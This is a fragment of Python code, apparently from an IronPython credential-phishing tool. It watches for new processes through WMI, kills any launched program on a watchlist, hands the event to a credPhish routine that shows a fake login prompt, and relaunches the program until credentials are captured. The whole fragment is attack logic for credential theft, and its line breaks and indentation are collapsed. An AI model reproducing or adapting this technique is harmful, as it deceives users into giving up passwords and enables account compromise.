def procWatch(): print "[*] Watching Process Creation for: {0}".format(", ".join(WATCHLIST)) while GOT_CRED is False: try: proc = startWatch.WaitForNextEvent() if proc['TargetInstance']['Name'] in WATCHLIST: Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill() print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine']) cp = credPhish(proc) if hasattr(cp, "NewProcess"): cp.NewProcess.Start() print "[+] PROCESS SPAWNED: {0}\t{1} {2}".format(cp.NewProcess.Id, cp.path, cp.NewProcess.StartInfo.Arguments) #Process.GetCurrentProcess.Kill() Thread.GetCurrentThread().Abort() except: break